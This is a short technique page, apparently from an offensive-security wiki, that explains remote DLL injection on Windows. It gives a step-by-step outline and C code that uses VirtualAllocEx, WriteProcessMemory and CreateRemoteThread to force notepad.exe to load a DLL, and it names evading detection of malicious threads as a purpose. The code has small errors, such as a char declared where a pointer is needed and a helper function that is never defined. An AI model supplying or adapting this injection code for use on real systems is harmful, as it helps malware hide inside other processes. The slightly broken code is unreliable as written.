Remote DLL Injection

Table of content

Overview

The Remote DLL Injection is a process injection technique that can be used to force a remote process to load a given DLL.

This technique can be used to avoid creating a thread starting on a maicious section on the remote process.

Blueprint

This technique leverage the LoadLibrary Windows API. The idea is to execute this API on the remote process. This can be achieved using the following steps:

  1. Open the remote process with OpenProcess
  2. Allocate a new section in the process with VirtualAllocEx
  3. Write the DLL absolute path in the newly allocated section in the remote process with WriteProcessMemory
  4. Retrieve the LoadLibrary address with GetProcAddress
  5. Run the thread with CreateRemoteThread
// The DLL to load
char dllPath = "C:\\Windows\\System32\\amsi.dll";
// Get the remote process handle
DWORD PID;
HANDLE processHandle = getProcHandlebyName(L"notepad.exe", &PID);
// Allocate memory to write the DLL path
PVOID remoteDllPathAddr = VirtualAllocEx(processHandle, NULL, strlen(dllPath), MEM_COMMIT, PAGE_READWRITE);
// Write the DLL pah
WriteProcessMemory(processHandle, remoteDllPathAddr, (LPVOID)dllPath, strlen(dllPath), NULL);
// Get the LoadLibraryA address
PTHREAD_START_ROUTINE routineAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
// Create and run the new thread
CreateRemoteThread(processHandle, NULL, 0, routineAddr, remoteDllPathAddr, 0, NULL);
CloseHandle(processHandle);

Once this code is run, the AMSI.DLL is injected into notepad.exe: AMSI.DLL injected into Notepad

results matching ""

    No results matching ""

    results matching ""

      No results matching ""